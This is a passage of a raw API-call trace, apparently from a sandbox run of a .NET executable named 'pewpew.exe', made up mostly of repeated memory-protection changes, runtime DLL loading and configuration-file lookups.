OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.545] GetCurrentProcess () returned 0xffffffff [0074.545] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750571b4, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.545] GetCurrentProcess () returned 0xffffffff [0074.545] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750571c4, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.545] GetCurrentProcess () returned 0xffffffff [0074.545] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750571c4, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.546] GetCurrentProcess () returned 0xffffffff [0074.546] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750571c8, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.546] GetCurrentProcess () returned 0xffffffff [0074.546] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750571c8, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.546] GetCurrentProcess () returned 0xffffffff [0074.546] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750571cc, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.546] GetCurrentProcess () returned 0xffffffff [0074.546] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750571cc, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.546] GetCurrentProcess () returned 0xffffffff [0074.547] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750571f4, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.547] GetCurrentProcess () returned 0xffffffff [0074.547] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750571f4, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.547] GetCurrentProcess () returned 0xffffffff [0074.547] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750571fc, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.547] GetCurrentProcess () returned 0xffffffff [0074.547] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750571fc, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.547] GetCurrentProcess () returned 0xffffffff [0074.547] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x75057220, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.548] GetCurrentProcess () returned 0xffffffff [0074.548] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x75057220, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.548] GetCurrentProcess () returned 0xffffffff [0074.548] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x75057294, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.548] GetCurrentProcess () returned 0xffffffff [0074.548] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x75057294, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.548] GetCurrentProcess () returned 0xffffffff [0074.548] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x7505729c, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.548] GetCurrentProcess () returned 0xffffffff [0074.548] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x7505729c, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.549] GetCurrentProcess () returned 0xffffffff [0074.549] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750572a4, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.549] GetCurrentProcess () returned 0xffffffff [0074.549] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750572a4, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.549] GetCurrentProcess () returned 0xffffffff [0074.549] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750572bc, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.549] GetCurrentProcess () returned 0xffffffff [0074.549] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750572bc, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.549] GetCurrentProcess () returned 0xffffffff [0074.550] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750572c0, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.550] GetCurrentProcess () returned 0xffffffff [0074.550] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750572c0, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.550] GetCurrentProcess () returned 0xffffffff [0074.550] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750572cc, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.550] GetCurrentProcess () returned 0xffffffff [0074.550] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750572cc, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.550] GetCurrentProcess () returned 0xffffffff [0074.550] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750572ec, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.551] GetCurrentProcess () returned 0xffffffff [0074.551] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x750572ec, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.551] GetCurrentProcess () returned 0xffffffff [0074.551] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x75057368, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.551] GetCurrentProcess () returned 0xffffffff [0074.551] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x75057368, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.551] GetCurrentProcess () returned 0xffffffff [0074.551] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x7505736c, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x4, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x2) returned 0x0 [0074.551] GetCurrentProcess () returned 0xffffffff [0074.551] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef494*=0x7505736c, NumberOfBytesToProtect=0x6ef498, NewAccessProtection=0x2, OldAccessProtection=0x6ef4cc | out: BaseAddress=0x6ef494*=0x75057000, NumberOfBytesToProtect=0x6ef498, OldAccessProtection=0x6ef4cc*=0x4) returned 0x0 [0074.552] GetProcAddress (hModule=0x74a00000, lpProcName="SetRuntimeInfo") returned 0x74aae2aa [0074.919] GetProcAddress (hModule=0x74a00000, lpProcName="_CorExeMain") returned 0x74b0af29 [0075.923] SysReAllocStringLen (in: pbstr=0x6ef4c4*=0x0, psz="api-ms-win-core-quirks-l1-1-0.dll", len=0x21 | out: pbstr=0x6ef4c4*="api-ms-win-core-quirks-l1-1-0.dll") returned 1 [0075.923] CharLowerBuffW (in: lpsz="api-ms-win-core-quirks-l1-1-0.dll", cchLength=0x21 | out: lpsz="api-ms-win-core-quirks-l1-1-0.dll") returned 0x21 [0075.923] LoadLibraryExW (lpLibFileName="api-ms-win-core-quirks-l1-1-0.dll", hFile=0x0, dwFlags=0x800) returned 0x0 [0075.923] GetLastError () returned 0x57 [0075.923] SetLastError (dwErrCode=0x57) [0077.240] SysReAllocStringLen (in: pbstr=0x6ef06c*=0x0, psz="api-ms-win-appmodel-runtime-l1-1-0.dll", len=0x26 | out: pbstr=0x6ef06c*="api-ms-win-appmodel-runtime-l1-1-0.dll") returned 1 [0077.240] CharLowerBuffW (in: lpsz="api-ms-win-appmodel-runtime-l1-1-0.dll", cchLength=0x26 | out: lpsz="api-ms-win-appmodel-runtime-l1-1-0.dll") returned 0x26 [0077.240] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x0 [0077.242] GetLastError () returned 0x7e [0077.242] SetLastError (dwErrCode=0x7e) [0077.259] SysReAllocStringLen (in: pbstr=0x6eea98*=0x0, psz="mscoree.dll", len=0xb | out: pbstr=0x6eea98*="mscoree.dll") returned 1 [0077.260] CharLowerBuffW (in: lpsz="mscoree.dll", cchLength=0xb | out: lpsz="mscoree.dll") returned 0xb [0077.260] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0077.260] GetLastError () returned 0x7e [0077.260] SetLastError (dwErrCode=0x7e) [0077.260] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ab4, cbMultiByte=11, lpWideCharStr=0x6edf74, cchWideChar=2047 | out: lpWideCharStr="mscoree.dlln돲矇?°?°") returned 11 [0077.260] SysReAllocStringLen (in: pbstr=0x6eef78*=0x0, psz="mscoree.dll", len=0xb | out: pbstr=0x6eef78*="mscoree.dll") returned 1 [0077.260] CharLowerBuffW (in: lpsz="mscoree.dll", cchLength=0xb | out: lpsz="mscoree.dll") returned 0xb [0077.261] LoadLibraryExA (lpLibFileName="mscoree.dll", hFile=0x0, dwFlags=0x0) returned 0x75620000 [0077.261] GetLastError () returned 0x0 [0077.261] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x75621010, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x4, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x20) returned 0x0 [0077.261] GetCurrentProcess () returned 0xffffffff [0077.261] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x75621010, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x20, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x4) returned 0x0 [0077.261] GetCurrentProcess () returned 0xffffffff [0077.261] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x75621018, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x4, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x20) returned 0x0 [0077.262] GetCurrentProcess () returned 0xffffffff [0077.262] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x75621018, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x20, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x4) returned 0x0 [0077.262] GetCurrentProcess () returned 0xffffffff [0077.262] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x75621054, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x4, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x20) returned 0x0 [0077.262] GetCurrentProcess () returned 0xffffffff [0077.262] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x75621054, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x20, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x4) returned 0x0 [0077.262] GetCurrentProcess () returned 0xffffffff [0077.262] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x75621060, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x4, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x20) returned 0x0 [0077.263] GetCurrentProcess () returned 0xffffffff [0077.263] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x75621060, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x20, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x4) returned 0x0 [0077.263] GetCurrentProcess () returned 0xffffffff [0077.263] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x7562107c, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x4, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x20) returned 0x0 [0077.263] GetCurrentProcess () returned 0xffffffff [0077.263] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x7562107c, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x20, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x4) returned 0x0 [0077.263] GetCurrentProcess () returned 0xffffffff [0077.263] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x756210a8, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x4, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x20) returned 0x0 [0077.264] GetCurrentProcess () returned 0xffffffff [0077.264] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x756210a8, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x20, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x4) returned 0x0 [0077.264] GetCurrentProcess () returned 0xffffffff [0077.264] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x7562110c, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x4, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x20) returned 0x0 [0077.264] GetCurrentProcess () returned 0xffffffff [0077.264] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x7562110c, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x20, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x4) returned 0x0 [0077.264] GetCurrentProcess () returned 0xffffffff [0077.264] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x7562114c, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x4, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x20) returned 0x0 [0077.264] GetCurrentProcess () returned 0xffffffff [0077.264] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x7562114c, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x20, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x4) returned 0x0 [0077.265] GetCurrentProcess () returned 0xffffffff [0077.265] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x75621154, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x4, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x20) returned 0x0 [0077.265] GetCurrentProcess () returned 0xffffffff [0077.265] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x75621154, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x20, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x4) returned 0x0 [0077.265] GetCurrentProcess () returned 0xffffffff [0077.265] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x756211b0, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x4, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x20) returned 0x0 [0077.265] GetCurrentProcess () returned 0xffffffff [0077.265] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eef64*=0x756211b0, NumberOfBytesToProtect=0x6eef68, NewAccessProtection=0x20, OldAccessProtection=0x6eef9c | out: BaseAddress=0x6eef64*=0x75621000, NumberOfBytesToProtect=0x6eef68, OldAccessProtection=0x6eef9c*=0x4) returned 0x0 [0077.266] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.266] GetLastError () returned 0x2 [0077.266] SysReAllocStringLen (in: pbstr=0x6eef90*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", len=0x37 | out: pbstr=0x6eef90*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config") returned 1 [0077.266] GetThreadLocale () returned 0x409 [0077.266] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0077.266] GetThreadLocale () returned 0x409 [0077.266] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0077.266] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", nBufferLength=0x104, lpBuffer=0x6eed14, lpFilePart=0x6eed10 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", lpFilePart=0x6eed10*="pewpew.exe.config") returned 0x37 [0077.267] SysReAllocStringLen (in: pbstr=0x6eef90*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", len=0x37 | out: pbstr=0x6eef90*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config") returned 1 [0077.267] SysReAllocStringLen (in: pbstr=0x6eef40*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", len=0x37 | out: pbstr=0x6eef40*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config") returned 1 [0077.267] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", cchLength=0x37 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe.config") returned 0x37 [0077.267] SysReAllocStringLen (in: pbstr=0x6eef90*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe.config", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe.config", len=0x37 | out: pbstr=0x6eef90*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe.config") returned 1 [0077.267] SetLastError (dwErrCode=0x2) [0077.267] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0077.271] GetLastError () returned 0x0 [0077.272] SysReAllocStringLen (in: pbstr=0x6eefb0*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x6eefb0*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0077.272] GetThreadLocale () returned 0x409 [0077.272] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0077.272] GetThreadLocale () returned 0x409 [0077.272] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0077.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x104, lpBuffer=0x6eed34, lpFilePart=0x6eed30 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x6eed30*="machine.config") returned 0x43 [0077.272] SysReAllocStringLen (in: pbstr=0x6eefb0*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x6eefb0*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0077.272] SysReAllocStringLen (in: pbstr=0x6eef60*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x6eef60*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0077.272] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchLength=0x43 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 0x43 [0077.272] SysReAllocStringLen (in: pbstr=0x6eefb0*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x6eefb0*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 1 [0077.272] SetLastError (dwErrCode=0x0) [0077.276] GetCurrentThreadId () returned 0xb0c [0077.276] GetCurrentThreadId () returned 0xb0c [0077.276] GetCurrentThreadId () returned 0xb0c [0077.276] GetCurrentThreadId () returned 